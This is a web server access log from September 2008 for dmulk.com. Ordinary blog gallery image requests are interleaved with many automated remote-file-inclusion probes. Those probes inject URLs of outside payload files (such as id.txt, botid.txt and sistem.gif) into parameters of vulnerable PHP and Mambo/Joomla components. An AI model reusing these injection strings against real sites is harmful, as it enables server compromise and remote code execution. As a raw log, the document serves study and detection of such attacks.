72.199.235.196 - - [20/Sep/2008:10:31:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0013.jpg HTTP/1.1" 200 552361 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:31:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_4.jpg HTTP/1.1" 200 386585 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:31:58 -0700] "GET /logs/access_080321.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:32:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-273.jpg HTTP/1.1" 200 261409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:32:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:32:12 -0700] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:32:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:32:12 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:32:15 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:32:22 -0700] "GET /logs/access_080826.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:32:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_1.jpg HTTP/1.1" 200 284519 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:32:29 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:32:29 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:32:30 -0700] "GET //index.php?DOCUMENT_ROOT=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 200 92396 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:32:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-291.jpg HTTP/1.1" 200 197121 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:32:44 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:32:46 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92716 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:32:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008_1.jpg HTTP/1.1" 200 558987 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:33:00 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:33:02 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92656 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:33:05 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.243.169.10 - - [20/Sep/2008:10:33:10 -0700] "GET /logs//components/errors.php?error=http://www.stadtbuecherei-erftstadt.de/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [20/Sep/2008:10:33:10 -0700] "GET /logs/access_080302.log//components/errors.php?error=http://www.stadtbuecherei-erftstadt.de/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:33:19 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:33:32 -0700] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:33:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067_1.jpg HTTP/1.1" 200 327269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:33:47 -0700] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:33:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050.jpg HTTP/1.1" 200 554749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:34:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 200 386583 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:34:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-247.jpg HTTP/1.1" 200 309057 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:34:24 -0700] "GET /logs/access_080123.log/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:34:24 -0700] "GET /?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 200 92356 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:34:26 -0700] "GET /logs/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 200 65877 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:34:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-064_1.jpg HTTP/1.1" 200 508766 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:34:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-206.jpg HTTP/1.1" 200 307503 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:34:52 -0700] "GET /logs/access_080805.log/HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:34:53 -0700] "GET /HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:34:53 -0700] "GET /logs/HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:34:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-237.jpg HTTP/1.1" 200 341180 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:34:58 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:34:58 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:34:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 200 92306 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:35:01 -0700] "GET /logs/access.log/HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:35:07 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:35:09 -0700] "GET /logs/access_080825.log//configuration.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:35:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-009_0.jpg HTTP/1.1" 200 379037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:35:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-241.jpg HTTP/1.1" 200 404653 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:35:29 -0700] "GET /logs/access_080128.log/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [20/Sep/2008:10:35:31 -0700] "GET /logs/access_080302.log%20%20//components/errors.php?error=http://www.stadtbuecherei-erftstadt.de/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:35:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048_3.jpg HTTP/1.1" 200 322041 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:35:43 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:35:44 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:35:44 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:35:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-245.jpg HTTP/1.1" 200 304855 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:35:56 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:35:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.803" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:36:00 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:36:01 -0700] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:36:01 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92700 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:36:03 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:36:09 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92624 "-" "libwww-perl/5.808" "www.dmulk.com"
72.243.169.10 - - [20/Sep/2008:10:36:16 -0700] "GET /logs/access_080328.log%20%20//components/errors.php?error=http://www.stadtbuecherei-erftstadt.de/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:36:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0035.jpg HTTP/1.1" 200 391510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:36:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-125.jpg HTTP/1.1" 200 700424 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:36:43 -0700] "GET /?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 200 92324 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:37:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-184.jpg HTTP/1.1" 200 278339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:37:03 -0700] "GET /logs/access_080824.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:37:04 -0700] "GET /logs/access_080905.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.111.95.4 - - [20/Sep/2008:10:37:05 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.111.95.4 - - [20/Sep/2008:10:37:06 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.casicool.de/chat/lib/bid.txt? HTTP/1.1" 200 92515 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:37:07 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:37:07 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:37:09 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:37:09 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:37:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060_0.jpg HTTP/1.1" 200 479572 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:37:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-029_2.jpg HTTP/1.1" 200 519629 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:37:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083.jpg HTTP/1.1" 200 465831 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
212.227.118.7 - - [20/Sep/2008:10:37:55 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92715 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:37:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-159_0.jpg HTTP/1.1" 200 381556 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:38:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-033.jpg HTTP/1.1" 200 400718 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
62.48.116.192 - - [20/Sep/2008:10:38:16 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:38:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_1.jpg HTTP/1.1" 200 521888 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:38:30 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [20/Sep/2008:10:38:30 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://nawaoh.t35.com/cd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:38:30 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:38:32 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.810" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:38:37 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92716 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:38:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-133_1.jpg HTTP/1.1" 200 363012 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:38:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-173_0.jpg HTTP/1.1" 200 259264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:38:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:39:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92690 "-" "libwww-perl/5.805" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:39:04 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:39:05 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:39:05 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:39:06 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:39:06 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:39:06 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92736 "-" "libwww-perl/5.802" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:39:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-145_1.jpg HTTP/1.1" 200 343530 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:39:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015.jpg HTTP/1.1" 200 424706 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:39:26 -0700] "GET /logs/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 200 65877 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:39:28 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:39:28 -0700] "GET /?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 200 92340 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:39:28 -0700] "GET /logs//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:39:33 -0700] "GET /logs/access_080520.log//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:39:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_1.jpg HTTP/1.1" 200 453244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:39:42 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:39:43 -0700] "GET /logs/access_080416.log//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:39:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 200 92791 "-" "libwww-perl/5.79" "www.dmulk.com"
